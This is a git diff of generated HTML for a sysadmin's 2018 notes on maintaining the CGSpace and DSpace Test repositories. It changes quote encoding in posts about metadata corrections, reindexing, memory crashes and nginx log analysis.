org.apache.jasper.JasperException: java.lang.NullPointerException
</code></pre><ul>
@ -295,7 +295,7 @@ org.apache.jasper.JasperException: java.lang.NullPointerException
<li>I have removed the old server (linode02 aka linode578611) in favor of linode19 aka linode6624164</li>
<li>Looking at the CRP subjects on CGSpace I see there is one blank one so I&rsquo;ll just fix it:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=230 and text_value=&#39;&#39;;
</code></pre><ul>
<li>Copy all CRP subjects to a CSV to do the mass updates:</li>
</ul>
@ -304,7 +304,7 @@ COPY 21
</code></pre><ul>
<li>Once I prepare the new input forms (<a href="https://github.com/ilri/DSpace/issues/362">#362</a>) I will need to do the batch corrections:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.crp -t correct -m 230 -n -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-21-CRPs-2018-03-16.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.crp -t correct -m 230 -n -d
</code></pre><ul>
<li>Create a pull request to update the input forms for the new CRP subject style (<a href="https://github.com/ilri/DSpace/pull/366">#366</a>)</li>
</ul>
@ -322,7 +322,7 @@ COPY 21
</code></pre><ul>
<li>But these errors, I don&rsquo;t even know what they mean, because a handful of them happen every day:</li>
</ul>
<pre tabindex="0"><code>$ grep -c 'ERROR org.dspace.storage.rdbms.DatabaseManager' dspace.log.2018-03-1*
<pre tabindex="0"><code>$ grep -c &#39;ERROR org.dspace.storage.rdbms.DatabaseManager&#39; dspace.log.2018-03-1*
dspace.log.2018-03-10:13
dspace.log.2018-03-11:15
dspace.log.2018-03-12:13
@ -336,7 +336,7 @@ dspace.log.2018-03-19:90
</code></pre><ul>
<li>There wasn&rsquo;t even a lot of traffic at the time (89 AM):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;19/Mar/2018:0[89]:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;19/Mar/2018:0[89]:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.197
92 83.103.94.48
96 40.77.167.175
@ -351,7 +351,7 @@ dspace.log.2018-03-19:90
<li>Well there is a hint in Tomcat&rsquo;s <code>catalina.out</code>:</li>
</ul>
<pre tabindex="0"><code>Mon Mar 19 09:05:28 UTC 2018 | Query:id: 92032 AND type:2
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-280&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-280&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>So someone was doing something heavy somehow&hellip; my guess is content and usage stats!</li>
<li>ICT responded that they &ldquo;fixed&rdquo; the CGSpace connectivity issue in Nairobi without telling me the problem</li>
@ -377,21 +377,21 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
<li>Abenet told me that one of Lance Robinson&rsquo;s ORCID iDs on CGSpace is incorrect</li>
<li>I will remove it from the controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/367">#367</a>) and update any items using the old one:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value='Lance W. Robinson: 0000-0002-5224-8644' where resource_type_id=2 and metadata_field_id=240 and text_value like '%0000-0002-6344-195X%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;Lance W. Robinson: 0000-0002-5224-8644&#39; where resource_type_id=2 and metadata_field_id=240 and text_value like &#39;%0000-0002-6344-195X%&#39;;
UPDATE 1
</code></pre><ul>
<li>Communicate with DSpace editors on Yammer about being more careful about spaces and character editing when doing manual metadata edits</li>
<li>Merge the changes to CRP names to the <code>5_x-prod</code> branch and deploy on CGSpace (<a href="https://github.com/ilri/DSpace/pull/363">#363</a>)</li>
<li>Run corrections for CRP names in the database:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Run all system updates on CGSpace (linode18) and reboot the server</li>
<li>I started a full Discovery re-index on CGSpace because of the updated CRPs</li>
<li>I see this error in the DSpace log:</li>
</ul>
<pre tabindex="0"><code>2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for field &quot;dc_contributor_author&quot;.
java.lang.IllegalArgumentException: No choices plugin was configured for field &quot;dc_contributor_author&quot;.
<pre tabindex="0"><code>2018-03-20 19:03:14,844 ERROR com.atmire.dspace.discovery.AtmireSolrService @ No choices plugin was configured for field &#34;dc_contributor_author&#34;.
java.lang.IllegalArgumentException: No choices plugin was configured for field &#34;dc_contributor_author&#34;.
at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:261)
at org.dspace.content.authority.ChoiceAuthorityManager.getLabel(ChoiceAuthorityManager.java:249)
at org.dspace.browse.SolrBrowseCreateDAO.additionalIndex(SolrBrowseCreateDAO.java:215)
@ -415,15 +415,15 @@ java.lang.IllegalArgumentException: No choices plugin was configured for field
<li>Unfortunately this causes those items to simply not be indexed, which users noticed because item counts were cut in half and old items showed up in RSS!</li>
<li>Since we&rsquo;ve migrated the ORCID identifiers associated with the authority data to the <code>cg.creator.id</code> field we can nullify the authorities remaining in the database:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">dspace<span style="color:#f92672">=#</span> <span style="color:#66d9ef">UPDATE</span> metadatavalue <span style="color:#66d9ef">SET</span> authority<span style="color:#f92672">=</span><span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">WHERE</span> resource_type_id<span style="color:#f92672">=</span><span style="color:#ae81ff">2</span> <span style="color:#66d9ef">AND</span> metadata_field_id<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> <span style="color:#66d9ef">AND</span> authority <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>;
<span style="color:#66d9ef">UPDATE</span> <span style="color:#ae81ff">195463</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>dspace<span style="color:#f92672">=#</span> <span style="color:#66d9ef">UPDATE</span> metadatavalue <span style="color:#66d9ef">SET</span> authority<span style="color:#f92672">=</span><span style="color:#66d9ef">NULL</span> <span style="color:#66d9ef">WHERE</span> resource_type_id<span style="color:#f92672">=</span><span style="color:#ae81ff">2</span> <span style="color:#66d9ef">AND</span> metadata_field_id<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> <span style="color:#66d9ef">AND</span> authority <span style="color:#66d9ef">IS</span> <span style="color:#66d9ef">NOT</span> <span style="color:#66d9ef">NULL</span>;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">UPDATE</span> <span style="color:#ae81ff">195463</span>
</span></span></code></pre></div><ul>
<li>After this the indexing works as usual and item counts and facets are back to normal</li>
<li>Send Peter a list of all authors to correct:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql">dspace<span style="color:#f92672">=#</span> <span style="color:#960050;background-color:#1e0010">\</span><span style="color:#66d9ef">copy</span> (<span style="color:#66d9ef">select</span> <span style="color:#66d9ef">distinct</span> text_value, <span style="color:#66d9ef">count</span>(<span style="color:#f92672">*</span>) <span style="color:#66d9ef">as</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">from</span> metadatavalue <span style="color:#66d9ef">where</span> metadata_field_id <span style="color:#f92672">=</span> (<span style="color:#66d9ef">select</span> metadata_field_id <span style="color:#66d9ef">from</span> metadatafieldregistry <span style="color:#66d9ef">where</span> element <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;contributor&#39;</span> <span style="color:#66d9ef">and</span> qualifier <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;author&#39;</span>) <span style="color:#66d9ef">AND</span> resource_type_id <span style="color:#f92672">=</span> <span style="color:#ae81ff">2</span> <span style="color:#66d9ef">group</span> <span style="color:#66d9ef">by</span> text_value <span style="color:#66d9ef">order</span> <span style="color:#66d9ef">by</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">desc</span>) <span style="color:#66d9ef">to</span> <span style="color:#f92672">/</span>tmp<span style="color:#f92672">/</span>authors.csv <span style="color:#66d9ef">with</span> csv header;
<span style="color:#66d9ef">COPY</span> <span style="color:#ae81ff">56156</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span>dspace<span style="color:#f92672">=#</span> <span style="color:#960050;background-color:#1e0010">\</span><span style="color:#66d9ef">copy</span> (<span style="color:#66d9ef">select</span> <span style="color:#66d9ef">distinct</span> text_value, <span style="color:#66d9ef">count</span>(<span style="color:#f92672">*</span>) <span style="color:#66d9ef">as</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">from</span> metadatavalue <span style="color:#66d9ef">where</span> metadata_field_id <span style="color:#f92672">=</span> (<span style="color:#66d9ef">select</span> metadata_field_id <span style="color:#66d9ef">from</span> metadatafieldregistry <span style="color:#66d9ef">where</span> element <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;contributor&#39;</span> <span style="color:#66d9ef">and</span> qualifier <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;author&#39;</span>) <span style="color:#66d9ef">AND</span> resource_type_id <span style="color:#f92672">=</span> <span style="color:#ae81ff">2</span> <span style="color:#66d9ef">group</span> <span style="color:#66d9ef">by</span> text_value <span style="color:#66d9ef">order</span> <span style="color:#66d9ef">by</span> <span style="color:#66d9ef">count</span> <span style="color:#66d9ef">desc</span>) <span style="color:#66d9ef">to</span> <span style="color:#f92672">/</span>tmp<span style="color:#f92672">/</span>authors.csv <span style="color:#66d9ef">with</span> csv header;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">COPY</span> <span style="color:#ae81ff">56156</span>
</span></span></code></pre></div><ul>
<li>Afterwards we&rsquo;ll want to do some batch tagging of ORCID identifiers to these names</li>
<li>CGSpace crashed again this afternoon, I&rsquo;m not sure of the cause but there are a lot of SQL errors in the DSpace log:</li>
</ul>
@ -432,7 +432,7 @@ java.sql.SQLException: Connection has already been closed.
</code></pre><ul>
<li>I have no idea why so many connections were abandoned this afternoon:</li>
</ul>
<pre tabindex="0"><code># grep 'Mar 21, 2018' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
<pre tabindex="0"><code># grep &#39;Mar 21, 2018&#39; /var/log/tomcat7/catalina.out | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
268
</code></pre><ul>
<li>DSpace Test crashed again due to Java heap space, this is from the DSpace log:</li>
@ -448,7 +448,7 @@ java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>But there are tons of heap space errors on DSpace Test actually:</li>
</ul>
<pre tabindex="0"><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
319
</code></pre><ul>
<li>I guess we need to give it more RAM because it now has CGSpace&rsquo;s large Solr core</li>
@ -521,8 +521,8 @@ sys 2m45.135s
<p>Test the corrections and deletions locally, then run them on CGSpace:</p>
</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-2928-Authors-2018-03-21.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
$ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.contributor.author -m 3 -db dspacetest -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Afterwards I started a full Discovery reindexing on both CGSpace and DSpace Test</li>
<li>CGSpace took 76m28.292s</li>
@ -542,12 +542,12 @@ $ ./delete-metadata-values.py -i /tmp/Delete-8-Authors-2018-03-21.csv -f dc.cont
<li>DSpace Test crashed due to heap space so I&rsquo;ve increased it from 4096m to 5120m</li>
<li>The error in Tomcat&rsquo;s <code>catalina.out</code> was:</li>
</ul>
<pre tabindex="0"><code>Exception in thread &quot;RMI TCP Connection(idle)&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;RMI TCP Connection(idle)&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>Add ISI Journal (cg.isijournal) as an option in Atmire&rsquo;s Listing and Reports layout (<a href="https://github.com/ilri/DSpace/pull/370">#370</a>) for Abenet</li>
<li>I noticed a few hundred CRPs using the old capitalized formatting so I corrected them:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db cgspace -u cgspace -p &#39;fuuu&#39;
Fixed 29 occurences of: CLIMATE CHANGE, AGRICULTURE AND FOOD SECURITY
Fixed 7 occurences of: WATER, LAND AND ECOSYSTEMS
Fixed 19 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH

View File

@ -26,7 +26,7 @@ Catalina logs at least show some memory errors yesterday:
I tried to test something on DSpace Test but noticed that it&rsquo;s down since god knows when
Catalina logs at least show some memory errors yesterday:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -121,7 +121,7 @@ Catalina logs at least show some memory errors yesterday:
SEVERE: Unexpected death of background thread ContainerBackgroundProcessor[StandardEngine[Catalina]]
java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;ContainerBackgroundProcessor[StandardEngine[Catalina]]&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;ContainerBackgroundProcessor[StandardEngine[Catalina]]&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>So this is getting super annoying</li>
<li>I ran all system updates on DSpace Test and rebooted it</li>
@ -134,12 +134,12 @@ Exception in thread &quot;ContainerBackgroundProcessor[StandardEngine[Catalina]]
<li>Peter noticed that there were still some old CRP names on CGSpace, because I hadn&rsquo;t forced the Discovery index to be updated after I fixed the others last week</li>
<li>For completeness I re-ran the CRP corrections on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Correct-21-CRPs-2018-03-16.csv -f cg.contributor.crp -t correct -m 230 -db dspace -u dspace -p &#39;fuuu&#39;
Fixed 1 occurences of: AGRICULTURE FOR NUTRITION AND HEALTH
</code></pre><ul>
<li>Then started a full Discovery index:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx1024m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx1024m&#39;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 76m13.841s
@ -149,12 +149,12 @@ sys 2m2.498s
<li>Elizabeth from CIAT emailed to ask if I could help her by adding ORCID identifiers to all of Joseph Tohme&rsquo;s items</li>
<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i /tmp/jtohme-2018-04-04.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>The CSV format of <code>jtohme-2018-04-04.csv</code> was:</li>
</ul>
<pre tabindex="0"><code class="language-csv" data-lang="csv">dc.contributor.author,cg.creator.id
&quot;Tohme, Joseph M.&quot;,Joe Tohme: 0000-0003-2765-7101
&#34;Tohme, Joseph M.&#34;,Joe Tohme: 0000-0003-2765-7101
</code></pre><ul>
<li>There was a quoting error in my CRP CSV and the replacements for <code>Forests, Trees and Agroforestry</code> got messed up</li>
<li>So I fixed them and had to re-index again!</li>
@ -193,7 +193,7 @@ sys 2m52.585s
<li>Help Peter with the GDPR compliance / reporting form for CGSpace</li>
<li>DSpace Test crashed due to memory issues again:</li>
</ul>
<pre tabindex="0"><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
16
</code></pre><ul>
<li>I ran all system updates on DSpace Test and rebooted it</li>
@ -205,7 +205,7 @@ sys 2m52.585s
<li>I got a notice that CGSpace CPU usage was very high this morning</li>
<li>Looking at the nginx logs, here are the top users today so far:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;10/Apr/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Apr/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
282 207.46.13.112
286 54.175.208.220
287 207.46.13.113
@ -220,24 +220,24 @@ sys 2m52.585s
<li>45.5.186.2 is of course CIAT</li>
<li>95.108.181.88 appears to be Yandex:</li>
</ul>
<pre tabindex="0"><code>95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] &quot;GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1&quot; 200 2638 &quot;-&quot; &quot;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&quot;
<pre tabindex="0"><code>95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] &#34;GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1&#34; 200 2638 &#34;-&#34; &#34;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34;
</code></pre><ul>
<li>And for some reason Yandex created a lot of Tomcat sessions today:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2018-04-10
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2018-04-10
4363
</code></pre><ul>
<li>70.32.83.92 appears to be some harvester we&rsquo;ve seen before, but on a new IP</li>
<li>They are not creating new Tomcat sessions so there is no problem there</li>
<li>178.154.200.38 also appears to be Yandex, and is also creating many Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38' dspace.log.2018-04-10
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38&#39; dspace.log.2018-04-10
3982
</code></pre><ul>
<li>I&rsquo;m not sure why Yandex creates so many Tomcat sessions, as its user agent should match the Crawler Session Manager valve</li>
<li>Let&rsquo;s try a manual request with and without their user agent:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg 'User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'
<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg &#39;User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#39;
GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -294,7 +294,7 @@ X-XSS-Protection: 1; mode=block
<ul>
<li>In other news, it looks like the number of total requests processed by nginx in March went down from the previous months:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Mar/2018&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2018&#34;
2266594
real 0m13.658s
@ -305,23 +305,23 @@ sys 0m1.087s
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(151626) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(151626) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);&#39;
UPDATE 1
</code></pre><ul>
<li>Looking at abandoned connections in Tomcat:</li>
</ul>
<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
2115
</code></pre><ul>
<li>Apparently from these stacktraces we should be able to see which code is not closing connections properly</li>
<li>Here&rsquo;s a pretty good overview of days where we had database issues recently:</li>
</ul>
<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' | awk '{print $1,$2, $3}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; | awk &#39;{print $1,$2, $3}&#39; | sort | uniq -c | sort -n
1 Feb 18, 2018
1 Feb 19, 2018
1 Feb 20, 2018
@ -356,7 +356,7 @@ UPDATE 1
<ul>
<li>DSpace Test (linode19) crashed again some time since yesterday:</li>
</ul>
<pre tabindex="0"><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
168
</code></pre><ul>
<li>I ran all system updates and rebooted the server</li>
@ -374,7 +374,7 @@ UPDATE 1
<ul>
<li>While testing an XMLUI patch for <a href="https://jira.duraspace.org/browse/DS-3883">DS-3883</a> I noticed that there is still some remaining Authority / Solr configuration left that we need to remove:</li>
</ul>
<pre tabindex="0"><code>2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check &quot;solr.authority.server&quot; property in the dspace.cfg
<pre tabindex="0"><code>2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check &#34;solr.authority.server&#34; property in the dspace.cfg
java.lang.NullPointerException
</code></pre><ul>
<li>I assume we need to remove <code>authority</code> from the consumers in <code>dspace/config/dspace.cfg</code>:</li>
@ -422,14 +422,14 @@ webui.itemlist.sort-option.4 = type:dc.type:text
<li>They are missing the <code>order</code> parameter (ASC vs DESC)</li>
<li>I notice that DSpace Test has crashed again, due to memory:</li>
</ul>
<pre tabindex="0"><code># grep -c 'java.lang.OutOfMemoryError: Java heap space' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
178
</code></pre><ul>
<li>I will increase the JVM heap size from 5120M to 6144M, though we don&rsquo;t have much room left to grow as DSpace Test (linode19) is using a smaller instance size than CGSpace</li>
<li>Gabriela from CIP asked if I could send her a list of all CIP authors so she can do some replacements on the name formats</li>
<li>I got a list of all the CIP collections manually and use the same query that I used in <a href="/cgspace-notes/2017-08">August, 2017</a>:</li>
</ul>
<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/89347', '10568/88229', '10568/53086', '10568/53085', '10568/69069', '10568/53087', '10568/53088', '10568/53089', '10568/53090', '10568/53091', '10568/53092', '10568/70150', '10568/53093', '10568/64874', '10568/53094'))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/89347&#39;, &#39;10568/88229&#39;, &#39;10568/53086&#39;, &#39;10568/53085&#39;, &#39;10568/69069&#39;, &#39;10568/53087&#39;, &#39;10568/53088&#39;, &#39;10568/53089&#39;, &#39;10568/53090&#39;, &#39;10568/53091&#39;, &#39;10568/53092&#39;, &#39;10568/70150&#39;, &#39;10568/53093&#39;, &#39;10568/64874&#39;, &#39;10568/53094&#39;))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
</code></pre><h2 id="2018-04-19">2018-04-19</h2>
<ul>
<li>Run updates on DSpace Test (linode19) and reboot the server</li>
@ -460,17 +460,17 @@ sys 2m2.687s
</code></pre><ul>
<li>And there have been shit tons of errors in the last (starting only 20 minutes ago luckily):</li>
</ul>
<pre tabindex="0"><code># grep -c 'org.apache.tomcat.jdbc.pool.PoolExhaustedException' /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.PoolExhaustedException&#39; /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
32147
</code></pre><ul>
<li>I can&rsquo;t even log into PostgreSQL as the <code>postgres</code> user, WTF?</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
^C
</code></pre><ul>
<li>Here are the most active IPs today:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;20/Apr/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Apr/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
917 207.46.13.182
935 213.55.99.121
970 40.77.167.134
@ -484,11 +484,11 @@ sys 2m2.687s
</code></pre><ul>
<li>It doesn&rsquo;t even seem like there is a lot of traffic compared to the previous days:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;20/Apr/2018&quot; | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Apr/2018&#34; | wc -l
74931
# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E &quot;19/Apr/2018&quot; | wc -l
# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E &#34;19/Apr/2018&#34; | wc -l
91073
# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E &quot;18/Apr/2018&quot; | wc -l
# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E &#34;18/Apr/2018&#34; | wc -l
93459
</code></pre><ul>
<li>I tried to restart Tomcat but <code>systemctl</code> hangs</li>
